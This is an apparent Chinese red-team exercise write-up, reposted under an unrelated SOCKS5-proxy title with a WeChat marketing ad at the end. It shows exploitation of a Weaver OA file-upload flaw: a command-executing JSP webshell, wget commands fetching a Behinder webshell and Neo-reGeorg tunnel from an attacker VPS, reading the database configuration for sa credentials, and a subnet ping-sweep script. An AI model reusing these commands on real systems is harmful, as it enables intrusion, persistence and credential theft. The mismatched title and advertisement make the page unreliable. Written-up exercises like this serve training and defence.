socks5代理ip賬號密碼，socks5代理用戶名密碼？

記某次攻防演練實(shí)戰(zhàn)

0x01 信息收集 前期進(jìn)行相關(guān)的信息收集工作，發(fā)現(xiàn)主站的防護(hù)很嚴(yán)格，爆破被鎖，批量測試工具會被ban ip，難度很大心態(tài)有點(diǎn)崩。

子域名枚舉，訪問后發(fā)現(xiàn)是一個業(yè)務(wù)系統(tǒng)，IP定位是某海外IP。原來該公司有海外業(yè)務(wù)，終于找到了一個相對的邊緣資產(chǎn)。訪問該系統(tǒng)的網(wǎng)站主頁，對登錄框進(jìn)行測試： 抓登錄包進(jìn)行測試，隨便輸入賬號密碼之后提示License提交頁面：測試文件上傳功能點(diǎn)：發(fā)現(xiàn)cookie頭中包含ecology_JSession字段名，驗(yàn)證該指紋是泛微OA應(yīng)用。

0x02 web打點(diǎn) 用泛微OA的EXP進(jìn)行測試相關(guān)漏洞：

測試出泛微OA weaver.common.Ctrl任意文件上傳漏洞，上傳了一句話jsp。

手工測試該一句話jsp：http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=whoami發(fā)現(xiàn)可以進(jìn)行命令執(zhí)行，目標(biāo)系統(tǒng)為linux。

判斷目標(biāo)機(jī)器是否出網(wǎng)：目標(biāo)機(jī)器嘗試ping 我的VPS：VPS上監(jiān)聽80端口，目標(biāo)機(jī)器嘗試與80端口通信。發(fā)現(xiàn)目標(biāo)機(jī)器可以與我的VPS通信。

0x03 建立據(jù)點(diǎn)

1、嘗試使用webshell管理目標(biāo)： 生成冰蝎的jsp webshell，嘗試將冰蝎馬落到目標(biāo)機(jī)器上。http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=ping X.X.X.X -c 4http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=wgethttp://X.X.X.X

(1) 確定網(wǎng)站的絕對路徑： 絕對路徑為：/data/bdip/weaver/ecology/

(2) VSP啟臨時web服務(wù)發(fā)布webshell，目標(biāo)機(jī)器執(zhí)行下載命令： 確認(rèn)冰蝎馬落到目標(biāo)機(jī)器的網(wǎng)站絕對路徑下

。http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=pwdhttp://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=wget -P /data/bdip/weaver/ecology/ http://X.X.X.X/x.jsp使用冰蝎連接對應(yīng)的webshell，連接成功：

2、使用http_tunnel管理目標(biāo)

(1) 使用Neo-reGeorg工具生成http tunnel的jsp： python3 neoreg.py generate -k xxxx

(2) 下載tunnel.jsp馬到目標(biāo)機(jī)器上： 確認(rèn)tunnel.jsp文件落到目標(biāo)機(jī)器根目錄上。

(3) 在VPS上連接http tunnel jsp: http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=wget -P /data/bdip/weaver/ecology http://149.28.22.33/xx.jsppython3 neoreg.py -u http://X.X.X.X/tunnel.jsp -k xxx -p 1001

(4) 通過proxychains代理工具測試驗(yàn)證訪問目標(biāo)內(nèi)網(wǎng)：

0x04 當(dāng)前落腳點(diǎn)機(jī)器信息收集

1、尋找泛微OA連接數(shù)據(jù)庫配置文件：

2、查看連接數(shù)據(jù)庫的配置文件： 發(fā)現(xiàn)是MSSQL數(shù)據(jù)庫，且數(shù)據(jù)庫服務(wù)在本地開啟。

3、查看數(shù)據(jù)庫中的數(shù)據(jù)： 拿到sa用戶的密碼使用冰蝎去連接數(shù)據(jù)庫，可以看到對應(yīng)庫中的數(shù)據(jù)：

http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=ls -lrth /data/bdip/weaver/ecology/WEB-INF/prop/weaver.propertieshttp://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=cat /data/bdip/weaver/ecology/WEB-INF/prop/weaver.properties

0x05 內(nèi)網(wǎng)信息收集 1、查看當(dāng)前機(jī)器的IP及同網(wǎng)段的主機(jī)IP：

2、探測當(dāng)前網(wǎng)段存活主機(jī)：由于socks5代理無法代理ping流量。因此在VPS上準(zhǔn)備一個ping.sh腳本，臨時開啟http服務(wù)。#!/bin/bashfor i in {1..254} do

ping -c2 -i0.3 -W1 X.X.X.$i &>/dev/null

if [ $? -eq 0 ];then

echo "X.X.X.$i is up" else

echo "X.X.X.$i is down"

fidone目標(biāo)機(jī)器主動將ping.sh腳本下載到/opt目錄下：

給ping.sh腳本賦予可執(zhí)行權(quán)限：

運(yùn)行ping.sh腳本將探活結(jié)果寫到文件里：查看掃描結(jié)果除了落腳點(diǎn)這臺機(jī)器，竟然當(dāng)前網(wǎng)段只有1臺機(jī)器存活。

存活機(jī)器大概率是網(wǎng)關(guān)，沒有其他可以橫向移動的機(jī)器了。

查了下hosts文件發(fā)現(xiàn)是云某云主機(jī)，結(jié)束

首發(fā)tools by geo

好了，這篇文章的內(nèi)容發(fā)貨聯(lián)盟就和大家分享到這里，如果大家網(wǎng)絡(luò)推廣引流創(chuàng)業(yè)感興趣，可以添加微信：80709525  備注：發(fā)貨聯(lián)盟引流學(xué)習(xí)； 我拉你進(jìn)直播課程學(xué)習(xí)群，每周135晚上都是有實(shí)戰(zhàn)干貨的推廣引流技術(shù)課程免費(fèi)分享！